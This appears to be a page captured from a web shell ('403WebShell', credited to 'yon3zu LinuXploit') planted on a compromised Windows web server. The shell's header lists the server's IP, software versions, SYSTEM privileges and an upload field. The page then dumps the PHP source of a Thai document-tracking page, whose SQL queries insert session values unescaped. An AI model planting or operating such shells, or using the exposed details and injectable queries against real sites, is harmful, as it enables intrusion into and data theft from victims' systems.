403WebShell

403Webshell

Server IP : 172.67.187.206 / Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : E:/Inetpub/www/myoffice/2563/modules - Copy/tkk4/

Upload File :

[ Back ]

Current File : E:/Inetpub/www/myoffice/2563/modules - Copy/tkk4/readtkk4.php

<?
CheckUsersch($_SESSION['usersch_user'], $_SESSION['usersch_pwd']);
?>
<script type="text/javascript">
function showemotion() {
	emotion1.style.display = 'none';
	emotion2.style.display = '';
}
function closeemotion() {
	emotion1.style.display = '';
	emotion2.style.display = 'none';
}

function emoticon(theSmilie) {

	document.form2.COMMENT.value += ' ' + theSmilie + ' ';
	document.form2.COMMENT.focus();
}
</script>
	<TABLE cellSpacing=0 cellPadding=0 width=1005 height=450 border=0>
        <TR>
          <TD valign="top">
<?
$_GET['id'] = intval($_GET['id']);
//แสดงข่าวสาร/ประชาสัมพันธ์ 
//CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE username='".$_SESSION['usersch_user']."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
//CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[tkk4] = $db->select_query("SELECT  id, tabain, topic, kom, group_ska, posted,  post_date, full_text, full_texts, full_textu, full_texto,  full_texty, UNIX_TIMESTAMP(date) AS date2 FROM ".TB_TKK4." WHERE id='".$_GET[id]."' ");
$arr[tkk4] = $db->fetch($res[tkk4]);
$res[category] = $db->select_query("SELECT * FROM ".TB_WORKING_CAT." WHERE id='".$arr[tkk4][kom]."'  ");
$arr[category] = $db->fetch($res[category]);
$db->closedb ();
if(!$arr[tkk4][id]){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีเรื่อง</B></CENTER><BR><BR><BR><BR>";
}else{
	$Filetkk4Topic = "data/tkk4text/".$arr[tkk4][post_date].".txt";
	$file_open = @fopen($Filetkk4Topic, "r");
	$content = @fread ($file_open, @filesize($Filetkk4Topic));
	$Detail = stripslashes(FixQuotes($content));
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$q[Pageview] = "UPDATE ".TB_TKK4." SET pageview = pageview+1 WHERE id = '".$_GET[id]."' ";
	$sql[Pageview] = mysql_query ( $q[Pageview] ) or sql_error ( "db-query",mysql_error() );
	
	$db->closedb ();
?>
<TABLE align=center cellSpacing=0 cellPadding=0 width=800  border=0  >
        <TR align="left">
			<td width=700></td>
			<td width=100 align=center background="images/1234.jpg"><CENTER>
<?
 if($arr[usersch][level]==3){ 	  
?>
	<FORM NAME="form2" METHOD=POST ACTION="?name=tkk4&file=comment&id=<?echo $arr[tkk4][id];?>">
	<INPUT TYPE="hidden" NAME="catno" style="width:150" VALUE="<?=$arr[usersch][id];?> "  readonly style=\"color: #FF0000" > 
	<INPUT TYPE="submit" value="ลงทะเบียนรับ"style="background-color:#FFFF99"></FORM>
 <? } else {echo ""; }?>
<?
 if($arr[user][level]==3){ 	  
?>
<A HREF="?name=tkk4&category=<?=$arr[user][id];?>"><FONT COLOR="red"><B>ออกจากหน้านี้</B></FONT></A>
 <? } else {echo ""; }?>
	</CENTER></td>
			</TR>
			</TABLE>
<CENTER>
<table width="800" align=""border="0" cellspacing="0" cellpadding="0">
	<tr>
    <td width="700" background="images/1234.jpg" colspan="5"> 
	<IMG SRC="images/crut.png">
	<BR>
	<FONT COLOR="#000000" >เลขทะเบียน :  <?echo thainumDigit($arr[tkk4][tabain]);?>
	<BR>
	<FONT COLOR="#000000">เรื่อง : <?echo thainumDigit($arr[tkk4][topic]);?>
	<BR>
ลง<?echo thainumDigit(ThaiTimeConvert($arr[tkk4][date2],'1',''));?>
	<BR>
ถึง <?=$arr[tkk4][group_ska];?>
	<BR>
<FONT COLOR="#000000">ผู้ส่ง : <?=$arr[tkk4][posted];?>  <?=$arr[category][category_name];?>
<BR>
<FONT COLOR="#000000">ว/ด/ป ที่ส่ง: <?echo thainumDigit(ThaiTimeConvert($arr[tkk4][post_date],'',''));?>
<BR>
	<?
					 if($arr[tkk4][full_text]){ 	  
?>
<FONT COLOR="#0000FF">เอกสาร :
<a href="data/tkk4/<?=$arr[tkk4][full_text];?>" target="_blank"><FONT COLOR="#FF0000"><b>หนังสือนำ</b></A>,
		  <? } else {
		 echo "";
	 }?>
	 <?
					 if($arr[tkk4][full_texts]){ 	  
?>
<a href="data/tkk4/<?=$arr[tkk4][full_texts];?>" target="_blank"><FONT COLOR="#0000FF" ><b>แนบฉบับ 1</b></A>,
		  <? } else {
		 echo "";
	 }?>
	 <?
					 if($arr[tkk4][full_textu]){ 	  
?>
<a href="data/tkk4/<?=$arr[tkk4][full_textu];?>" target="_blank"><FONT COLOR="#0000FF"><b>แนบฉบับ 2</b></A>,
		  <? } else {
		 echo "";
	 }?>
	 <?
					 if($arr[tkk4][full_texto]){ 	  
?>
<a href="data/tkk4/<?=$arr[tkk4][full_texto];?>" target="_blank"><FONT COLOR="#0000FF" ><b>แนบฉบับ 3</b></A>,
		  <? } else {
		 echo "";
	 }?>
 <?
					 if($arr[tkk4][full_texty]){ 	  
?>
<a href="data/tkk4/<?=$arr[tkk4][full_texty];?>" target="_blank"><FONT COLOR="#0000FF"><b>แนบฉบับ 4</b></A>
		  <? } else {
		 echo "";
	 }?>
	 <BR><BR>
	

	<?
	}

?>

							</TD>
						</TR>
						</TABLE>
			</td>
		 <tr></table>
			<CENTER>
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit